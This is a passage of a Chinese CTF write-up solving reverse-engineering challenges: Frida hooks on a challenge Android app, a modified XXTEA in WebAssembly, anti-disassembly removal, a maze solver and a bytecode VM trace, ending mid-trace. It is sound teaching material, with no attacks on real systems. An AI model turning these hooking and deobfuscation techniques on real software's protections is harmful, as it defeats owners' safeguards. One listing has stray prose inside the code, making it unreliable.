从返回的指针位置,读取 32 字节的解密结果数据 var resbyte = res.readByteArray(32); // 打印解密后的字节内容 console.log("decrypt resbyte:\n", resbyte); </code></pre> <p>在交互界面输入自定义的函数名callDecrypt()</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-022.png" alt="" /></p> <p>之后我们找出iv数组</p> <p>ivGen 是伪随机数算法。以123456为种子生成 了16字节的数组,最后转递到java层</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-023.png" alt="" /></p> <p>我们可以用frida hook NativeLoader.INSTANCE.ivGen()</p> <p>hook脚本,输入正确的用户名,密码随便输入就可以得到</p> <pre><code>Java.perform(function () { let NativeLoader = Java.use("com.huanghunr.androidchallenge.NativeLoader"); let instance = NativeLoader.INSTANCE.value; // 拿到单例对象 NativeLoader.ivGen.implementation = function () { let result = instance.ivGen(); // 调用单例对象的方法 console.log("ivGen result =", JSON.stringify(result)); return result; }; }); // 主动调用 function getiv(){ let NativeLoader = Java.use("com.huanghunr.androidchallenge.NativeLoader").$new(); var result = NativeLoader.ivGen(); console.log("ivGen result =", JSON.stringify(result)); return result; } </code></pre> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-024.png" alt="" /></p> <p>拿之前解出的数据于iv异或得到最后一段flag5 <em>Th3_w0rld_Of</em>@ndroid_15_am@z!ng</p> <pre><code>iv = [43,-35,-113,-32,-104,-91,31,35,-49,125,-42,17,2,83,121,73] encdata = bytes.fromhex("74 89 e7 d3 c7 d2 2f 51 a3 19 89 5e 64 0c 39 27 4f af e0 89 fc fa 2e 16 90 1c bb 51 78 72 17 2e".replace(" ", "")) res = [] for i in range(len(encdata)): res.append(encdata[i] ^ iv[i % len(iv)] &amp; 0xff) print(bytes(res).decode()) </code></pre> <p>flag{0nc$3@te_@c7iv17ys_@5S3$ts_5trin9_4oLi8_Th3_w0rld_Of_@ndroid_15_am@z!ng}</p> <h1>3.ezwasm</h1> <p>打开开发者工具台,在源码里下载三个原文件,一个wasm,一个js,一个css</p> <p>配置好ghidra环境,安装好ghidra-wasm插件</p> <p>打开wasm文件,在exports里打开check函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-025.png" alt="" /></p> <p>你可以去吧里面的函数都看看是什么作用,来给他们命名,这里我就不赘述了,只看其中重要的两个函数</p> <p>一个是 (unnamed_function_1)是一个SplitMix64随机数算法 种子是0x9e3779b97f4a7c15</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-026.png" alt="" /></p> <p>一个是 (unnamed_function_22)是一个xxtea算法,魔改了轮数,左右移位和delta</p> <pre><code>void unnamed_function_22(undefined4 param1,undefined4 param2,undefined4 param3) { int iVar1; undefined4 uVar2; int iVar3; undefined4 uVar4; uint uVar5; undefined4 uVar6; undefined4 uVar7; undefined1 auStack_24 [4]; undefined1 auStack_20 [4]; undefined1 auStack_1c [4]; undefined1 auStack_18 [4]; undefined1 auStack_14 [4]; undefined1 auStack_10 [4]; undefined1 auStack_c [4]; undefined1 auStack_8 [4]; undefined1 auStack_4 [4]; unnamed_function_23(param1,auStack_4); unnamed_function_24(param2,auStack_8); unnamed_function_25(param3,auStack_c); unnamed_function_26(0x4c,auStack_20); unnamed_function_27(0,auStack_18); iVar1 = unnamed_function_28(auStack_4); uVar2 = unnamed_function_29(auStack_8); iVar3 = unnamed_function_30(uVar2,1); uVar2 = unnamed_function_31(iVar1 + iVar3 * 4); unnamed_function_32(uVar2,auStack_14); do { uVar2 = unnamed_function_33(auStack_18); uVar2 = unnamed_function_34(uVar2,0x1ce4e5b9); unnamed_function_35(uVar2,auStack_18); uVar2 = unnamed_function_36(auStack_18); uVar2 = unnamed_function_37(uVar2,2); uVar2 = unnamed_function_38(uVar2,3); unnamed_function_39(uVar2,auStack_24); unnamed_function_40(0,auStack_1c); while( true ) { uVar2 = unnamed_function_41(auStack_1c); uVar4 = unnamed_function_42(auStack_8); uVar4 = unnamed_function_43(uVar4,1); uVar5 = unnamed_function_44(uVar2,uVar4); if ((uVar5 &amp; 1) == 0) break; iVar1 = unnamed_function_45(auStack_4); uVar2 = unnamed_function_46(auStack_1c); iVar3 = unnamed_function_47(uVar2,1); uVar2 = unnamed_function_48(iVar1 + iVar3 * 4); unnamed_function_49(uVar2,auStack_10); uVar2 = unnamed_function_50(auStack_14); uVar2 = unnamed_function_51(uVar2,6); uVar4 = unnamed_function_52(auStack_10); uVar4 = unnamed_function_53(uVar4,1); uVar2 = unnamed_function_54(uVar2,uVar4); uVar4 = unnamed_function_55(auStack_10); uVar4 = unnamed_function_56(uVar4,5); uVar6 = unnamed_function_57(auStack_14); uVar6 = unnamed_function_58(uVar6,6); uVar4 = unnamed_function_59(uVar4,uVar6); uVar2 = unnamed_function_60(uVar2,uVar4); uVar4 = unnamed_function_61(auStack_18); uVar6 = unnamed_function_62(auStack_10); uVar4 = unnamed_function_63(uVar4,uVar6); iVar1 = unnamed_function_64(auStack_c); uVar6 = unnamed_function_65(auStack_1c); uVar6 = unnamed_function_66(uVar6,3); uVar7 = unnamed_function_67(auStack_24); iVar3 = unnamed_function_68(uVar6,uVar7); uVar6 = unnamed_function_69(iVar1 + iVar3 * 4); uVar7 = unnamed_function_70(auStack_14); uVar6 = unnamed_function_71(uVar6,uVar7); uVar4 = unnamed_function_72(uVar4,uVar6); uVar2 = unnamed_function_73(uVar2,uVar4); iVar1 = unnamed_function_74(auStack_4); iVar3 = unnamed_function_75(auStack_1c); iVar1 = iVar1 + iVar3 * 4; uVar4 = unnamed_function_76(iVar1); uVar2 = unnamed_function_77(uVar4,uVar2); unnamed_function_78(uVar2,iVar1); unnamed_function_79(uVar2,auStack_14); uVar2 = unnamed_function_80(auStack_1c); uVar2 = unnamed_function_81(uVar2,1); unnamed_function_82(uVar2,auStack_1c); } uVar2 = unnamed_function_83(auStack_4); uVar2 = unnamed_function_84(uVar2); unnamed_function_85(uVar2,auStack_10); uVar2 = unnamed_function_86(auStack_14); uVar2 = unnamed_function_87(uVar2,6); uVar4 = unnamed_function_88(auStack_10); uVar4 = unnamed_function_89(uVar4,1); uVar2 = unnamed_function_90(uVar2,uVar4); uVar4 = unnamed_function_91(auStack_10); uVar4 = unnamed_function_92(uVar4,5); uVar6 = unnamed_function_93(auStack_14); uVar6 = unnamed_function_94(uVar6,6); uVar4 = unnamed_function_95(uVar4,uVar6); uVar2 = unnamed_function_96(uVar2,uVar4); uVar4 = unnamed_function_97(auStack_18); uVar6 = unnamed_function_98(auStack_10); uVar4 = unnamed_function_99(uVar4,uVar6); iVar1 = unnamed_function_100(auStack_c); uVar6 = unnamed_function_101(auStack_1c); uVar6 = unnamed_function_102(uVar6,3); uVar7 = unnamed_function_103(auStack_24); iVar3 = unnamed_function_104(uVar6,uVar7); uVar6 = unnamed_function_105(iVar1 + iVar3 * 4); uVar7 = unnamed_function_106(auStack_14); uVar6 = unnamed_function_107(uVar6,uVar7); uVar4 = unnamed_function_108(uVar4,uVar6); uVar2 = unnamed_function_109(uVar2,uVar4); iVar1 = unnamed_function_110(auStack_4); uVar4 = unnamed_function_111(auStack_8); iVar3 = unnamed_function_112(uVar4,1); iVar1 = iVar1 + iVar3 * 4; uVar4 = unnamed_function_113(iVar1); uVar2 = unnamed_function_114(uVar4,uVar2); unnamed_function_115(uVar2,iVar1); unnamed_function_116(uVar2,auStack_14); uVar2 = unnamed_function_117(auStack_20); uVar2 = unnamed_function_118(uVar2,0xffffffff); unnamed_function_119(uVar2,auStack_20); uVar5 = unnamed_function_120(uVar2,0); } while ((uVar5 &amp; 1) != 0); return; } </code></pre> <p>这是官方wp中更换函数名字之后tea加密算法函数</p> <pre><code>void xxtea(undefined4 param1,undefined4 param2,undefined4 param3) { undefined4 uVar1; int iVar2; undefined4 uVar3; uint uVar4; int key; undefined4 p; undefined4 e; undefined e_1 [4]; undefined round [4]; undefined i [4]; undefined sum [4]; undefined z [4]; undefined auStack_10 [4]; undefined inputKey [4]; undefined len [4]; undefined input [4]; a2b(param1,input); a2b(param2,len); a2b(param3,inputKey); a2b(0x4c,round); a2b(0,sum); key = gv(input); uVar1 = gv(len); iVar2 = sub(uVar1,1); uVar1 = gv(key + iVar2 * 4); a2b(uVar1,z); do { uVar1 = gv(sum); uVar1 = add(uVar1,0x1ce4e5b9); a2b(uVar1,sum); uVar1 = gv(sum); uVar1 = ror(uVar1,2); uVar1 = and(uVar1,3); a2b(uVar1,e_1); a2b(0,i); while( true ) { uVar1 = gv(i); uVar3 = gv(len); uVar3 = sub(uVar3,1); uVar4 = AlowB(uVar1,uVar3); if ((uVar4 &amp; 1) = 0) break; key = gv(input); uVar1 = gv(i); iVar2 = add(uVar1,1); uVar1 = gv(key + iVar2 * 4); a2b(uVar1,auStack_10); uVar1 = gv(z); uVar1 = ror(uVar1,6); uVar3 = gv(auStack_10); uVar3 = rol(uVar3,1); uVar1 = xor(uVar1,uVar3); uVar3 = gv(auStack_10); uVar3 = ror(uVar3,5); p = gv(z); p = rol(p,6); uVar3 = xor(uVar3,p); uVar1 = add(uVar1,uVar3); uVar3 = gv(sum); p = gv(auStack_10); uVar3 = xor(uVar3,p); key = gv(inputKey); p = gv(i); p = and(p,3); e = gv(e_1); iVar2 = xor(p,e); p = gv(key + iVar2 * 4); e = gv(z); p = xor(p,e); uVar3 = add(uVar3,p); uVar1 = xor(uVar1,uVar3); key = gv(input); iVar2 = gv(i); key = key + iVar2 * 4; uVar3 = gv(key); uVar1 = add(uVar3,uVar1); a2b(uVar1,key); a2b(uVar1,z); uVar1 = gv(i); 大概命名完后正式分析check函数。 uVar1 = gv(uVar1,1); a2b(uVar1,i); } uVar1 = unnamed_function_83(input); /后面和上面差不多 uVar1 = unnamed_function_84(uVar1); unnamed_function_85(uVar1,auStack_10); uVar1 = unnamed_function_86(z); uVar1 = unnamed_function_87(uVar1,6); uVar3 = unnamed_function_88(auStack_10); uVar3 = unnamed_function_89(uVar3,1); uVar1 = unnamed_function_90(uVar1,uVar3); uVar3 = unnamed_function_91(auStack_10); uVar3 = unnamed_function_92(uVar3,5); p = unnamed_function_93(z); p = unnamed_function_94(p,6); uVar3 = unnamed_function_95(uVar3,p); uVar1 = unnamed_function_96(uVar1,uVar3); uVar3 = unnamed_function_97(sum); p = unnamed_function_98(auStack_10); uVar3 = unnamed_function_99(uVar3,p); key = unnamed_function_100(inputKey); p = unnamed_function_101(i); p = unnamed_function_102(p,3); e = unnamed_function_103(e_1); iVar2 = unnamed_function_104(p,e); p = unnamed_function_105(key + iVar2 * 4); e = unnamed_function_106(z); p = unnamed_function_107(p,e); uVar3 = unnamed_function_108(uVar3,p); uVar1 = unnamed_function_109(uVar1,uVar3); key = unnamed_function_110(input); uVar3 = unnamed_function_111(len); iVar2 = unnamed_function_112(uVar3,1); key = key + iVar2 * 4; uVar3 = unnamed_function_113(key); uVar1 = unnamed_function_114(uVar3,uVar1); unnamed_function_115(uVar1,key); unnamed_function_116(uVar1,z); uVar1 = unnamed_function_117(round); uVar1 = unnamed_function_118(uVar1,0xffffffff); unnamed_function_119(uVar1,round); uVar4 = unnamed_function_120(uVar1,0); } while ((uVar4 &amp; 1) = 0); return; } </code></pre> <p>而第一个函数是key生成函数</p> <p>之后第22个函数也就是tea算法函数用这个key对输入进行加密</p> <p>动态获取key</p> <p>在wasm文件中调用func22函数出下断点,找到key</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-027.png" alt="" /></p> <p>密文为</p> <pre><code> 0x95,0xB5,0xE4,0x59, 0xCF,0xD4,0xE1,0x51, 0x18,0x84,0x37,0xAA, 0xE6,0xF7,0x65,0x18, 0x93,0x41,0x4A,0x3E, 0x7C,0x37,0xD0,0x6B, 0xD7,0x20,0x86,0x63, 0x10,0x83,0x63,0x7B, 0xA8,0x11,0x9B,0x24, 0x3D,0x26,0xCD,0x6B </code></pre> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-028.png" alt="" /></p> <p>解密脚本</p> <pre><code>#!/usr/bin/env python3 from typing import List def u32(x): return x &amp; 0xFFFFFFFF def dec_btea(v: List[int], n: int, key: List[int]) -&gt; List[int]: delta=0x1ce4e5b9; rounds=0x4c; s=(rounds*delta)&amp;0xFFFFFFFF; y=v[0] for _ in range(rounds): e=(s&gt;&gt;2)&amp;3 for p in range(n-1,0,-1): z=v[p-1] t=(((z&gt;&gt;6)^((y&lt;&lt;1)&amp;0xFFFFFFFF))+((y&gt;&gt;5)^((z&lt;&lt;6)&amp;0xFFFFFFFF)))&amp;0xFFFFFFFF t^=((s^y)+(key[(p&amp;3)^e]^z))&amp;0xFFFFFFFF v[p]=u32(v[p]-t); y=v[p] z=v[n-1] t=(((z&gt;&gt;6)^((y&lt;&lt;1)&amp;0xFFFFFFFF))+((y&gt;&gt;5)^((z&lt;&lt;6)&amp;0xFFFFFFFF)))&amp;0xFFFFFFFF t^=((s^y)+(key[e]^z))&amp;0xFFFFFFFF v[0]=u32(v[0]-t); s=u32(s-delta); y=v[0] return v def b2u32le(b: bytes) -&gt; List[int]: return [int.from_bytes(b[i:i+4],'little') for i in range(0,len(b),4)] def u322ble(v: List[int]) -&gt; bytes: return b''.join(x.to_bytes(4,'little') for x in v) ct=bytes([0x95,0xB5,0xE4,0x59,0xCF,0xD4,0xE1,0x51,0x18,0x84,0x37,0xAA,0xE6,0xF7,0x65,0x18,0x93,0x41,0x4A,0x3E,0x7C,0x37,0xD0,0x6B,0xD7,0x20,0x86,0x63,0x10,0x83,0x63,0x7B,0xA8,0x11,0x9B,0x24,0x3D,0x26,0xCD,0x6B]) key=b2u32le(bytes([0xF3,0x76,0x8A,0xE6,0xB3,0xA7,0x0A,0x93,0xE5,0x3E,0xC0,0x61,0x25,0xE7,0xA0,0xD3])) v=b2u32le(ct) pt=u322ble(dec_btea(v,len(v),key))[:len(ct)] print(pt.decode('latin1')) </code></pre> <p>flag{THi5_1s_4_fuNNY_Wa5m_ch4IlEnGE_10L}</p> <p>注意每个附件的key和密文不一样</p> <h1>4.Hachimi</h1> <p>一道异常处理的题</p> <p>try块</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-029.png" alt="" /></p> <p>except块</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-030.png" alt="" /></p> <p>按官方wp中, 找到except块,也就是捕获异常的代码块,如果try块代码触发异常,则不会执行红框处代码,不会jmp带结尾,会 执行下面的 _except(loc_4013C9)块。但是反编译识别到这个jmp就让下面的代码都反编译不了了,我们要把except块全nop掉,就能看到完整main函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-031.png" alt="" /></p> <p>去看加密函数的时候会发现最后会返回39</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-032.png" alt="" /></p> <p>转到汇编,会看到下面还有一段没有被编译器识别到, 由于ida识别失败,会将这个 retn认为是函数是retn,所以反编译代码就截止到这边,后续的没了 ,我们把这段花指令,从push eax到retn全nop掉</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-033.png" alt="" /></p> <p>完整加密函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-034.png" alt="" /></p> <p>xxtea密钥</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-035.png" alt="" /></p> <p>密文</p> <pre><code> 0x4D, 0x7A, 0x3E, 0x7A, 0x84, 0xFF, 0x51, 0xB1, 0x31, 0x97, 0xFB, 0xDC, 0x2B, 0xA4, 0xCD, 0xFB, 0x85, 0xCD, 0x0A, 0x2B, 0xBD, 0x91, 0xCF, 0x69, 0xBA, 0x2B, 0x70, 0xD5, 0x43, 0xB8, 0x3E, 0x1F </code></pre> <p>解密脚本</p> <pre><code>import struct def xtea_decrypt_block(v0, v1, key): DELTA = 0x9E3779B9 sum_ = (DELTA * 32) &amp; 0xFFFFFFFF for _ in range(32): v1 = (v1 - (((v0 &lt;&lt; 4 ^ v0 &gt;&gt; 5) + v0) ^ (sum_ + key[(sum_ &gt;&gt; 11) &amp; 3]))) &amp; 0xFFFFFFFF sum_ = (sum_ - DELTA) &amp; 0xFFFFFFFF v0 = (v0 - (((v1 &lt;&lt; 4 ^ v1 &gt;&gt; 5) + v1) ^ (sum_ + key[sum_ &amp; 3]))) &amp; 0xFFFFFFFF return v0, v1 k0 = 1495531287 k1 = (-1758678609) &amp; 0xFFFFFFFF k2 = (-880611118) &amp; 0xFFFFFFFF k3 = (-38157364) &amp; 0xFFFFFFFF key = [k0, k1, k2, k3] key_bytes = struct.pack('&lt;IIII', *key) whitening = key_bytes[8:16][::-1] ciphertext = bytes([0x4D, 0x7A, 0x3E, 0x7A, 0x84, 0xFF, 0x51, 0xB1, 0x31, 0x97, 0xFB, 0xDC, 0x2B, 0xA4, 0xCD, 0xFB, 0x85, 0xCD, 0x0A, 0x2B, 0xBD, 0x91, 0xCF, 0x69, 0xBA, 0x2B, 0x70, 0xD5, 0x43, 0xB8, 0x3E, 0x1F]) plaintext = b'' for i in range(0, len(ciphertext), 8): block = ciphertext[i:i+8] temp = bytes(b ^ w for b, w in zip(block, whitening)) v0, v1 = struct.unpack('&gt;II', temp) v0, v1 = xtea_decrypt_block(v0, v1, key) pt_block = struct.pack('&lt;II', v0, v1) plaintext += pt_block print(plaintext.decode('ascii', errors='ignore').strip()) </code></pre> <p>flag{ha_ha_hachimi_na_bei_lu_do}</p> <h1>5.specialMaze</h1> <p>IDA打开main函数,一个走地图的题</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-036.png" alt="" /></p> <p>我们直接看sub_1400011C0函数</p> <pre><code>char __fastcall sub_1400011C0(char a1) { char result; // al unsigned int v2; // [rsp+0h] [rbp-28h] switch ( a1 ) { case 'a': v2 = dword_1400051C4 - 1; break; case 'd': v2 = dword_1400051C4 + 1; break; case 's': v2 = dword_1400051C4 + 18; break; case 'w': v2 = dword_1400051C4 - 18; break; default: return 0; } if ( v2 &gt;= 0x144 ) return 0; switch ( asc_140005080[v2] ) { case 0: dword_1400051C4 = v2; result = 0; break; case 4: if ( asc_140005080[79] ) --asc_140005080[79]; result = 0; break; case 5: if ( asc_140005080[195] ) --asc_140005080[195]; result = 0; break; case 6: if ( asc_140005080[281] ) --asc_140005080[281]; result = 0; break; case 9: result = 0; break; case 100: dword_1400051C4 = v2; result = 1; break; default: result = 0; break; } return result; } </code></pre> <p>当前索引 dword_1400051C4 第二十个</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-037.png" alt="" /></p> <p>对应一下就是0</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-038.png" alt="" /></p> <p>然后输入字符只接受 <code>**w/a/s/d**</code>:</p> <ul> <li><code>a</code>: <code>pos-1</code>(左)</li> <li><code>d</code>: <code>pos+1</code>(右)</li> <li><code>w</code>: <code>pos-18</code>(上)</li> <li><code>s</code>: <code>pos+18</code>(下)</li> </ul> <p>根据目标格子的值做处理:</p> <ul> <li><code>0</code>:可走路面 → <strong>移动</strong>到该格(<code>pos = v2</code>),返回 <code>0</code>(未胜利)</li> <li><code>100</code>:终点 → <strong>移动</strong>到该格并返回 <code>1</code>(胜利)</li> <li><code>9</code>:阻塞(墙/陷阱)→ 不移动,返回 <code>0</code></li> <li><code>4/5/6</code>:<strong>开关按钮</strong>(不进格、只遥控) <ul> <li>尝试“走”向含 <code>4/5/6</code> 的邻格时,不移动,但会对<strong>另一个固定索引</strong>做 <code>--</code>: <ul> <li>走向 <code>4</code>:若 <code>asc[79] &gt; 0</code>,执行 <code>--asc[79]</code></li> <li>走向 <code>5</code>:若 <code>asc[195] &gt; 0</code>,执行 <code>--asc[195]</code></li> <li>走向 <code>6</code>:若 <code>asc[281] &gt; 0</code>,执行 <code>--asc[281]</code></li> </ul> </li> <li>按完仍在原地,返回 <code>0</code></li> </ul> </li> </ul> <p>完整地图</p> <pre><code> 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 0, 9, 4, 0, 0, 0, 0, 9, 0, 0, 0, 0, 5, 0, 0, 9, 9, 9, 0, 9, 9, 9, 0, 9, 0, 9, 9, 9, 9, 9, 0, 9, 0, 9, 9, 9, 0, 0, 0, 0, 0, 9, 0, 9, 0, 0, 0, 9, 0, 9, 0, 9, 9, 9, 9, 9, 9, 9, 9, 9, 1, 9, 0, 9, 0, 9, 0, 9, 9, 9, 9, 9, 0, 0, 0, 9, 0, 9, 0, 0, 0, 9, 0, 9, 0, 0, 0, 9, 9, 9, 0, 9, 0, 9, 0, 9, 9, 9, 9, 9, 0, 9, 0, 9, 0, 9, 9, 9, 0, 9, 0, 0, 0, 0, 0, 9, 0, 0, 0, 9, 0, 9, 0, 9, 9, 9, 0, 9, 9, 9, 9, 9, 9, 9, 0, 9, 9, 9, 9, 9, 0, 9, 9, 9, 6, 9, 0, 0, 0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 9, 9, 9, 0, 9, 0, 9, 9, 9, 0, 9, 9, 9, 9, 9, 9, 9, 2, 9, 9, 9, 0, 9, 0, 0, 0, 9, 0, 0, 0, 9, 0, 0, 0, 0, 0, 9, 9, 9, 0, 9, 9, 9, 0, 9, 9, 9, 0, 9, 0, 9, 9, 9, 9, 9, 9, 9, 0, 0, 0, 9, 0, 0, 0, 9, 0, 0, 0, 9, 0, 0, 0, 9, 9, 9, 0, 9, 0, 9, 9, 9, 0, 9, 9, 9, 9, 9, 0, 9, 0, 9, 9, 9, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 9, 0, 0, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 100, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9 </code></pre> <p>解题脚本</p> <pre><code>import hashlib from collections import deque GRID_HEX = """ 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x0 0x9 0x4 0x0 0x0 0x0 0x0 0x9 0x0 0x0 0x0 0x0 0x5 0x0 0x0 0x9 0x9 0x9 0x0 0x9 0x9 0x9 0x0 0x9 0x0 0x9 0x9 0x9 0x9 0x9 0x0 0x9 0x0 0x9 0x9 0x9 0x0 0x0 0x0 0x0 0x0 0x9 0x0 0x9 0x0 0x0 0x0 0x9 0x0 0x9 0x0 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x1 0x9 0x0 0x9 0x0 0x9 0x0 0x9 0x9 0x9 0x9 0x9 0x0 0x0 0x0 0x9 0x0 0x9 0x0 0x0 0x0 0x9 0x0 0x9 0x0 0x0 0x0 0x9 0x9 0x9 0x0 0x9 0x0 0x9 0x0 0x9 0x9 0x9 0x9 0x9 0x0 0x9 0x0 0x9 0x0 0x9 0x9 0x9 0x0 0x9 0x0 0x0 0x0 0x0 0x0 0x9 0x0 0x0 0x0 0x9 0x0 0x9 0x0 0x9 0x9 0x9 0x0 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x0 0x9 0x9 0x9 0x9 0x9 0x0 0x9 0x9 0x9 0x6 0x9 0x0 0x0 0x0 0x0 0x0 0x9 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x9 0x9 0x9 0x0 0x9 0x0 0x9 0x9 0x9 0x0 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x2 0x9 0x9 0x9 0x0 0x9 0x0 0x0 0x0 0x9 0x0 0x0 0x0 0x9 0x0 0x0 0x0 0x0 0x0 0x9 0x9 0x9 0x0 0x9 0x9 0x9 0x0 0x9 0x9 0x9 0x0 0x9 0x0 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x0 0x0 0x0 0x9 0x0 0x0 0x0 0x9 0x0 0x0 0x0 0x9 0x0 0x0 0x0 0x9 0x9 0x9 0x0 0x9 0x0 0x9 0x9 0x9 0x0 0x9 0x9 0x9 0x9 0x9 0x0 0x9 0x0 0x9 0x9 0x9 0x0 0x9 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x3 0x0 0x0 0x9 0x0 0x0 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x64 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 0x9 """ W = 18 G = [int(x, 16) for x in GRID_HEX.split()] START = 0x13 FINISH = 0x64 G4, G5, G6 = 79, 195, 281 def tile(i, c79, c195, c281): if i == G4: return c79 if i == G5: return c195 if i == G6: return c281 return G[i] def solve(): c79, c195, c281 = G[G4], G[G5], G[G6] q = deque([((START, c79, c195, c281), "")]) vis = {(START, c79, c195, c281)} moves = {"a": -1, "d": 1, "w": -W, "s": W} while q: (pos, c79, c195, c281), path = q.popleft() for ch, d in moves.items(): v = pos + d if not (0 &lt;= v &lt; W * W): continue t = tile(v, c79, c195, c281) if t == 0: s = (v, c79, c195, c281) if s not in vis: vis.add(s) q.append((s, path + ch)) elif t == FINISH: p = path + ch md5 = hashlib.md5(p.encode()).hexdigest().upper() print("path:", p) print("flag:", f"flag{{{md5}}}") return elif t == 4 and c79 &gt; 0: s = (pos, c79 - 1, c195, c281) if s not in vis: vis.add(s) q.append((s, path + ch)) elif t == 5 and c195 &gt; 0: s = (pos, c79, c195 - 1, c281) if s not in vis: vis.add(s) q.append((s, path + ch)) elif t == 6 and c281 &gt; 0: s = (pos, c79, c195, c281 - 1) if s not in vis: vis.add(s) q.append((s, path + ch)) print("no path") if __name__ == "__main__": solve() </code></pre> <p>路径</p> <p>ssddddwwaadddssssddwwddssssaassddddddwwwwaawwwwwsssddssssssaaaassaawwaawwaaaassddssddssaaaawwaawwwwwwsssddssddddddddddwwddssds</p> <p>flag{10FA984B6294B96D8D5699ED7D4EF61A}</p> <h1>6.VM</h1> <p>自定义的字节码加解释题</p> <p>先导入题目给的dbg附件</p> <p>在定位到runner解释器</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-039.png" alt="" /></p> <p>现在case1调用的函数的地方下条件断点,写入下面函数体</p> <pre><code>pc_addr=idc.get_name_ea_simple("pc") pc=ida_bytes.get_word(pc_addr) sp_addr=idc.get_name_ea_simple("sp_") sp=ida_bytes.get_word(sp_addr) rcx=idc.get_reg_value("rcx") rdx=idc.get_reg_value("rdx") r8=idc.get_reg_value("r8") r9=idc.get_reg_value("r9") op_name="_LOAD_CONST" print(pc, op_name, "sp{}".format(sp), rcx, rdx, r8, r9) </code></pre> <p>运行</p> <pre><code>0 _LOAD_CONST sp65535 1 0 0 56503560224 5 _LOAD_CONST sp65535 1 1 9223372036854775804 1692878378624 13 _LOAD_CONST sp65535 0 0 9151031864016699135 3026190458141290544 </code></pre> <p>接着case2下条件断点</p> <pre><code>3 _STORE_NAME sp65535 0 140696112143560 140696112205920 13846361207288113 8 _STORE_NAME sp65535 1 140696112143560 140696112205920 28262291131689595 </code></pre> <p>case3</p> <pre><code>12 _LEN sp65535 18446744073709551552 140696112143536 9223372036854775804 9295712209692852480 </code></pre> <p>case4</p> <pre><code>16 _COMPARE_OP sp65535 3 140696112143504 140696112205920 2371430651872 </code></pre> <p>类似就是这样的结果,之后就是我们在runner中每个调用函数的地方下一个条件断点</p> <p>调试,输入一个长度为30的字符串</p> <p>就可以得到</p> <pre><code>65535 _LOAD_CONST sp=65535 1 0 0 492153335056 65535 _STORE_NAME sp=65535 0 140702510881992 140702510944352 35291442962325857 65535 _LOAD_CONST sp=65535 1 1 9223372036854775804 2645304350336 65535 _STORE_NAME sp=65535 1 140702510881992 140702510944352 28262291131689595 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350336 65535 _LEN sp=65535 18446744073709551536 140702510881968 9223372036854775804 9295712209692852480 65535 _LOAD_CONST sp=65535 0 0 9151031864016699135 3026274227991896160 16 _COMPARE_OP sp65535 3 140702510881936 140702510944352 2645304350704 65535 _LOAD_CONST sp=65535 0 2 0 2645304350576 65535 _STORE_NAME sp=65535 2 140702510881992 140702510944352 2645304350640 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 32 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304350768 65535 _LOAD_NAME sp=65535 0 140702510881680 1 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 0 140702510881792 9223372036854775804 2645304350928 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350848 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304350912 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304350976 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304350912 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304350976 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304350912 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304350848 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350704 65535 _LOAD_CONST sp=65535 